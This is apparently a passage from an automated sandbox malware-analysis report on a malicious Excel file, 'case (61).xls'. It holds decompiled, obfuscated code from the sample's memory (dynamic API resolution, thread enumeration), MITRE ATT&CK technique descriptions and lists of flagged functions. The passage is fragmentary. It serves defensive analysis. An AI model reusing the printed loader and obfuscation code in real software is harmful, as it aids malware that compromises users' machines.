										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
										_t113 = E000E7DD0(0xc0);
										_v28 = 0;
										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
										_t114 = _v20;
										 *((char*)(_t177 + _t137 - 0x84)) = 0;
										_t173 = _t114;
										_t115 = E000E7DD0(0x8f);
										_t199 = _t192 + 0x24;
										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
											_t174 = _v24;
										} else {
											_t139 = _v24[1];
											__eflags = _t139;
											if(_t139 == 0) {
												_t174 =  &_v28;
											} else {
												_t161 = _t160 + _t173 - 0x524ccb65;
												do {
													_t120 = E000E55A0(_v28, 0xa);
													_t199 = _t199 + 8;
													_v28 = _t139 + _t120 - 0x30;
													_t139 =  *_t161 & 0x000000ff;
													_t161 =  &(_t161[1]);
													__eflags = _t139;
												} while (_t139 != 0);
												_t174 =  &_v28;
											}
										}
										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
									}
								}
							} else {
								goto L7;
							}
							goto L22;
							L7:
							_t135 = _t135 + 1;
							_t143 =  &(_v24[4]);
							_t153 =  &(_v20[1]);
						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
						_t141 = 0;
					}
				}
				L22:
				return _t141;
			}

0x000ed839
0x000ed83c
0x000ed83e
0x000ed840
0x000ed847
0x000ed852
0x000ed854
0x000ed85b
0x000ed860
0x000ed862
0x000ed865
0x000ed86d
0x000ed873
0x000ed873
0x000ed880
0x000ed894
0x000ed89f
0x000ed8af
0x000ed8b4
0x000ed8bb
0x000ed8be
0x000ed8c4
0x000ed8cc
0x000ed8d0
0x000ed8d2
0x000ed8d5
0x000ed8ea
0x000ed8f0
0x000ed90d
0x000ed912
0x000ed915
0x000ed919
0x000ed91b
0x000ed920
0x000ed92c
0x000ed942
0x000ed944
0x000ed949
0x000ed94c
0x000ed950
0x000ed920
0x000ed954
0x000ed95d
0x000ed962
0x000ed968
0x000ed98d
0x000ed9c4
0x000ed9d0
0x000ed9d8
0x000ed9db
0x000ed9e0
0x000ed9e5
0x000ed9e7
0x000ed9ea
0x000ed9ec
0x000ed9f2
0x000ed9fc
0x000ed9fe
0x000eda06
0x000eda0e
0x000eda11
0x000eda16
0x000eda19
0x000eda1c
0x000eda1e
0x000eda20
0x000eda22
0x000eda24
0x000eda24
0x000eda2c
0x000eda30
0x000eda30
0x000eda45
0x000eda51
0x000eda56
0x000eda5b
0x000eda61
0x000eda65
0x000eda68
0x000eda68
0x000eda30
0x000eda83
0x000eda88
0x000eda9a
0x000edaaa
0x000edab1
0x000edabe
0x000edac8
0x000edad7
0x000edae5
0x000edaec
0x000edaf3
0x000edaf6
0x000edb05
0x000edb0c
0x000edb11
0x000edb14
0x000edb16
0x000edb54
0x000edb18
0x000edb1e
0x000edb21
0x000edb23
0x000edb59
0x000edb25
0x000edb25
0x000edb30
0x000edb35
0x000edb3a
0x000edb44
0x000edb47
0x000edb4a
0x000edb4b
0x000edb4b
0x000edb4f
0x000edb4f
0x000edb23
0x000edb70
0x000edb70
0x000ed9fe
0x00000000
0x00000000
0x00000000
0x00000000
0x000ed96a
0x000ed973
0x000ed974
0x000ed977
0x000ed97a
0x000ed983
0x000ed983
0x000ed86d
0x000edb72
0x000edb7b

APIs

LoadLibraryA.KERNEL32(?), ref: 000EDB62
GetProcAddress.KERNEL32(00000000,?), ref: 000EDB6A

Strings

l, xrefs: 000EDAC8
d, xrefs: 000EDAB1

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: AddressLibraryLoadProc
String ID: d$l
API String ID: 2574300362-91452987
Opcode ID: 7a58c591b55f7b127f6fff3180f628c1247127cb5447b8649844b50e4f8b8192
Instruction ID: cd59c0b3d366bf8accb1e85476139d16dbbbb61f2235a36e00cfca884a9927f5
Opcode Fuzzy Hash: 7a58c591b55f7b127f6fff3180f628c1247127cb5447b8649844b50e4f8b8192
Instruction Fuzzy Hash: 9A912AF6D00299DFDB109FB5AC42AFE7BA4AF15358F090165EC49B7343EA319A0487A1

Uniqueness

Uniqueness Score: -1.00%

Function 000F69A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000F69A0(void* __eflags) {
				intOrPtr _v32;
				signed int _v36;
				void* _v44;
				signed char _t13;
				signed int _t16;
				signed int _t19;
				long _t23;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = CreateToolhelp32Snapshot(4, 0);
				_v44 = E000E9D50(0x647400b0);
				_t23 = GetCurrentProcessId();
				_t13 = E000E55C0(Thread32First(_t24,  &_v44), 0);
				_t27 = _t25 + 0xc;
				if((_t13 & 0x00000001) != 0) {
					L6:
					_t19 = 0;
				} else {
					0;
					0;
					while(GetLastError() != 0x12) {
						_t16 = E000E55C0(_v32, _t23);
						_t27 = _t27 + 8;
						_t19 =  ~(_t16 & 0x00000001) & _v36;
						if(Thread32Next(_t24,  &_v44) != 0) {
							if(_t19 == 0) {
								continue;
							} else {
							}
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t19;
			}

0x000f69b2
0x000f69c1
0x000f69ca
0x000f69d9
0x000f69de
0x000f69e3
0x000f6a25
0x000f6a25
0x000f69eb
0x000f69eb
0x000f69ef
0x000f69f0
0x000f69ff
0x000f6a04
0x000f6a11
0x000f6a1d
0x000f6a21
0x00000000
0x00000000
0x000f6a23
0x000f6a21
0x00000000
0x000f6a1d
0x00000000
0x000f69f0
0x000f6a27
0x000f6a30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000F69AD
GetCurrentProcessId.KERNEL32 ref: 000F69C4
Thread32First.KERNEL32(00000000,?), ref: 000F69D1
GetLastError.KERNEL32 ref: 000F69F0
Thread32Next.KERNEL32(00000000,?), ref: 000F6A16

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
String ID:
API String ID: 1709709923-0
Opcode ID: 2f0106dde38026a8e7084c17f86812564545a9adc1920ebc09c4a27e9d76c127
Instruction ID: 5d78ff776a5070c8bcd47a317e5f8cb47d37267c215419c2fecdaead15cf7902
Opcode Fuzzy Hash: 2f0106dde38026a8e7084c17f86812564545a9adc1920ebc09c4a27e9d76c127
Instruction Fuzzy Hash: 0201F2B298030C6BDB107BA5AC96FFF7A6CEF46315F480030FB04B1513E95A890496B2

Uniqueness

Uniqueness Score: -1.00%

Function 000E46E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E46E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
				signed int _v20;
				signed int _t33;
				int _t34;
				signed int _t45;
				struct tagRECT* _t46;
				signed char _t47;
				signed int _t48;
				WCHAR* _t49;
				struct HWND__* _t50;
				signed char _t51;
				signed char _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				struct _LUID* _t63;
				signed int _t64;
				signed int _t71;
				int _t73;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				struct HDC__* _t83;
				signed int _t84;

				_t73 = _a12;
				_t83 = _a8;
				_t45 = _t83 * 0x59;
				_t46 = _t45 ^ 0x000000fa;
				_t47 = _t46 & (_t45 ^ 0x00000023);
				OffsetRect(_t46, _t73, _t73);
				_t55 = _t47 + 0xbd;
				_t57 = (_t55 ^ _t47) + _t47;
				_t48 = _t55;
				_v20 = _t57;
				_t58 = _t57;
				_t75 = (_t58 + _t83) * _t48;
				if(_t83 != _t73 || _t58 >= _a8) {
					_t84 = _t75;
					_t49 = _t48 + _t84;
					_t83 = _t84 + _t49;
					LookupPrivilegeValueW(_t49, _t83, _a4);
					_t59 = _t83 + _t49;
					_t75 = _t59 | _t49;
					_t33 = _t49;
					_t48 = _t83;
					if(_a4 == 0xd9f29025) {
						goto L3;
					}
				} else {
					_t59 = _v20;
					if(_a4 != 0xd9f29025) {
						L7:
						_v20 = _t59;
						if(_t59 != _a12) {
							L11:
							_t34 = _a4;
							_t50 = _t48 + _t34;
							EndDialog(_t50, _t34);
							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
							_t62 = _t81 * _t50;
							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
							_t33 = _t50;
							_t48 = _t81;
							L12:
							if(_a8 == _a12) {
								_t82 = _t62;
								_t63 = _a4;
								if(_t63 != _a8 && _t33 != _t63) {
									SetTextColor(_t83, _a12);
									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
								}
							}
							return _t48;
						}
						_t64 = _t75;
						if(_t64 != _a12 || _t64 == _a4) {
							goto L11;
						} else {
							_t62 = _v20;
							goto L12;
						}
					}
					L3:
					if(_a8 != 0xd9f29025) {
						_t71 = _t59;
						if(_t71 == _a8) {
							_t59 = _t71;
						} else {
							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
							_t51 = _t48 + _t33;
							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
							_t59 = _t51 * _t83;
							_t48 = _t59 * 0x6c000000 >> 0x18;
						}
					}
				}
			}

0x000e46e7
0x000e46ea
0x000e46ed
0x000e46f4
0x000e46fa
0x000e46ff
0x000e4709
0x000e4711
0x000e4713
0x000e4715
0x000e4718
0x000e4720
0x000e4725
0x000e4781
0x000e4784
0x000e4786
0x000e4791
0x000e479a
0x000e479f
0x000e47a1
0x000e47a3
0x000e47ab
0x00000000
0x00000000
0x000e472c
0x000e4731
0x000e473a
0x000e47ad
0x000e47ad
0x000e47b6
0x000e47ca
0x000e47ca
0x000e47cd
0x000e47d1
0x000e47e2
0x000e47e7
0x000e47f9
0x000e47fc
0x000e47fe
0x000e4800
0x000e4806
0x000e4808
0x000e480a
0x000e4810
0x000e481d
0x000e4838
0x000e4838
0x000e4810
0x000e4844
0x000e4844
0x000e47b8
0x000e47be
0x00000000
0x000e47c5
0x000e47c5
0x00000000
0x000e47c5
0x000e47be
0x000e473c
0x000e4743
0x000e4745
0x000e474d
0x000e4845
0x000e4753
0x000e475d
0x000e4760
0x000e476d
0x000e4773
0x000e477c
0x000e477c
0x000e474d
0x000e4743

APIs

OffsetRect.USER32 ref: 000E46FF
LookupPrivilegeValueW.ADVAPI32(00000000,-00101D33,?), ref: 000E4791
EndDialog.USER32 ref: 000E47D1
SetTextColor.GDI32(-02621D33,-03E61D33), ref: 000E481D

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
String ID:
API String ID: 2289036324-0
Opcode ID: 6dcd930a2ae8393f764dfc8f6cf95c743aa01c6cd45587624e60dc9497f82bab
Instruction ID: d5793b2cc520cf5d92a354c2e445f33b2ae217b8fbf178d50a1ae570457c3360
Opcode Fuzzy Hash: 6dcd930a2ae8393f764dfc8f6cf95c743aa01c6cd45587624e60dc9497f82bab
Instruction Fuzzy Hash: 67412833B005645BDB18CE5ACCE06BF77EAEB99351B168139F859AB741C630AD45C6C0

Uniqueness

Uniqueness Score: -1.00%

Function 000E29D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E29D0(void* __eax, struct HWND__* _a4) {
				int _v20;
				signed int _t14;
				struct HDC__* _t21;
				signed int _t26;
				signed int _t28;
				long _t29;
				void* _t32;
				struct HWND__* _t33;
				signed int _t37;
				signed int _t38;
				struct HDC__* _t40;
				struct HWND__* _t42;
				signed int _t43;
				void* _t44;
				void** _t46;

				_t33 = _a4;
				_t26 = _t33 + (_t33 & 0x00000004);
				_t40 = _t26 * 0x6e;
				DeleteDC(_t40);
				_t14 = _t33 * _t40 * _t26;
				_t42 = _t40 + _t14 ^ 0x00000191;
				if(_t33 == 0x191 || _t42 != _t33) {
					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
					_t14 = (_t2 | 0x00000383) * 0x383;
				}
				_v20 = _t14;
				_t43 = _t42 * _t14;
				_t4 = _t43 + 0x368; // -1038795
				_t28 = _t4 - _t14;
				_t37 = _t28 ^ _t43;
				_t6 = _t43 + 0x368; // -1037923
				_t44 = _t37 + _t6;
				ResetEvent(_t44);
				_t29 = _t28 ^ _t44;
				_t38 = _t37 | _t29;
				_t32 = _t38 & _t44;
				_t7 = _t32 + 0x31; // -1038746
				_t21 = _t7 * _t44;
				_t46 = (_t21 + _t29) * _t38;
				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
				return _t46 * _t32;
			}

0x000e29d7
0x000e29df
0x000e29e1
0x000e29e5
0x000e29f0
0x000e29f5
0x000e2a01
0x000e2a17
0x000e2a1f
0x000e2a2b
0x000e2a2b
0x000e2a31
0x000e2a34
0x000e2a37
0x000e2a3d
0x000e2a41
0x000e2a43
0x000e2a43
0x000e2a4b
0x000e2a51
0x000e2a53
0x000e2a57
0x000e2a59
0x000e2a5c
0x000e2a62
0x000e2a6f
0x000e2a81

APIs

DeleteDC.GDI32(-000FDD33), ref: 000E29E5
SetWindowPos.USER32(-000FDD33,000E7BEC,00000191,000E7BEC,000E7BEC,000E7BEC,00000191), ref: 000E2A1F
ResetEvent.KERNEL32(-000FD663,?,000E7BEC,-00101FA0,-03E61D33,-00101D33,?,000E9287,-00101D33,?,000E77A1,00000001,?,-00101D33,?,000E6A74), ref: 000E2A4B
CreateDIBSection.GDI32(-000FD99A,-000FD99A,-000FD9CB,-000FD663,-000FD9CB,-000FD9CB), ref: 000E2A6F

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: CreateDeleteEventResetSectionWindow
String ID:
API String ID: 201249963-0
Opcode ID: 544a651b9fef4a2c18d7ac380c698ce0d6cf467c93f99232144391bb3fb2fae1
Instruction ID: 4bb3b0d2a39cd613f72f20e0bd6e0a98652f509f425d13665473c788d1017fdf
Opcode Fuzzy Hash: 544a651b9fef4a2c18d7ac380c698ce0d6cf467c93f99232144391bb3fb2fae1
Instruction Fuzzy Hash: 92110873B002247FD7258A5ADC49EDBBA5EE7C9750F0A0136F849EB150D5706F0586E0

Uniqueness

Uniqueness Score: -1.00%

Function 000FDA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000FDA20() {
				char _v28;
				void* _t4;

				_t4 = CreateEventW(0, 1, 0, E000E7200(0x1005f8,  &_v28));
				if(_t4 != 0) {
					SetEvent(_t4);
					_t4 = CloseHandle(_t4);
				}
				SetLastError(0);
				return _t4;
			}

0x000fda3f
0x000fda47
0x000fda4c
0x000fda53
0x000fda53
0x000fda5b
0x000fda66

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-00101D33,?,000E91EB,-00101D33,?,000E77A1,00000001), ref: 000FDA3F
SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-00101D33,?,000E91EB,-00101D33,?,000E77A1,00000001,?,-00101D33,?,000E6A74), ref: 000FDA4C
CloseHandle.KERNEL32(00000000), ref: 000FDA53
SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-00101D33,?,000E91EB,-00101D33,?,000E77A1,00000001,?,-00101D33,?,000E6A74), ref: 000FDA5B

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: Event$CloseCreateErrorHandleLast
String ID:
API String ID: 2055590504-0
Opcode ID: 4dd2b0066f0090674ea512de427511a2b8f9c038bae5eed5a99f3522d7e16d32
Instruction ID: 24736a8e9f10533fde91b59fa6f071a48df76f6eae61bf38dd9d1227508d0478
Opcode Fuzzy Hash: 4dd2b0066f0090674ea512de427511a2b8f9c038bae5eed5a99f3522d7e16d32
Instruction Fuzzy Hash: 8DE0D8B16402046BE21237E47C0AFBB372C9B08782F050010FB4DE94C1DAD04480C7B6

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report case (61).xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "case (61).xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145744

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Function 6E85AE40, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 372
injectionmemorythreadCOMMON

Function 6E86DA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Function 6E86D770, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Function 6E86B1B0, Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Function 6E8669A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Function 6E85D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Function 6E851A00, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Function 6E86DA70, Relevance: .7, Instructions: 746
COMMONCrypto

Function 6E865BF0, Relevance: .3, Instructions: 307
COMMONCrypto

Function 6E853A30, Relevance: .1, Instructions: 149
COMMONCrypto

Function 6E859A60, Relevance: .1, Instructions: 127
COMMONCrypto

Function 6E868830, Relevance: .1, Instructions: 113
COMMON

Function 6E859C60, Relevance: .1, Instructions: 95
COMMONCrypto

Function 6E86CE40, Relevance: .0, Instructions: 36
COMMON

Function 6E862EF0, Relevance: .0, Instructions: 2
COMMON

Function 6E8546E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Function 6E8529D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Function 000F9C90, Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Function 000E1AF0, Relevance: 1.6, APIs: 1, Instructions: 100
filenetworkCOMMON

Function 000EBA60, Relevance: 6.1, APIs: 4, Instructions: 107
registryCOMMON

Function 000FBAD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
networkCOMMON

Function 000F1E90, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Function 000EBCD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Function 000F8590, Relevance: 4.6, APIs: 3, Instructions: 128
COMMON

Function 000EA5E0, Relevance: 4.6, APIs: 3, Instructions: 100
filememoryCOMMON

Function 000EABF0, Relevance: 4.6, APIs: 3, Instructions: 59
registryCOMMON

Function 000F4680, Relevance: 3.7, APIs: 2, Instructions: 710
threadCOMMON

Function 000F3BC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Function 000F5180, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Function 000F9600, Relevance: 3.1, APIs: 2, Instructions: 93
fileCOMMON

Function 000FB790, Relevance: 3.1, APIs: 2, Instructions: 91
networkCOMMON

Function 000E21E0, Relevance: 3.1, APIs: 2, Instructions: 89
registryCOMMON

Function 000F5420, Relevance: 3.1, APIs: 2, Instructions: 72
fileCOMMON

Function 000F3D80, Relevance: 3.1, APIs: 2, Instructions: 72
registryCOMMON

Function 000FB530, Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 000EE030, Relevance: 3.1, APIs: 2, Instructions: 54
registryCOMMON

Function 000E3F90, Relevance: 3.1, APIs: 2, Instructions: 53
memoryCOMMON

Function 000F9C40, Relevance: 2.5, APIs: 2, Instructions: 29
COMMON

Function 000EBF50, Relevance: 1.7, APIs: 1, Instructions: 182
libraryCOMMON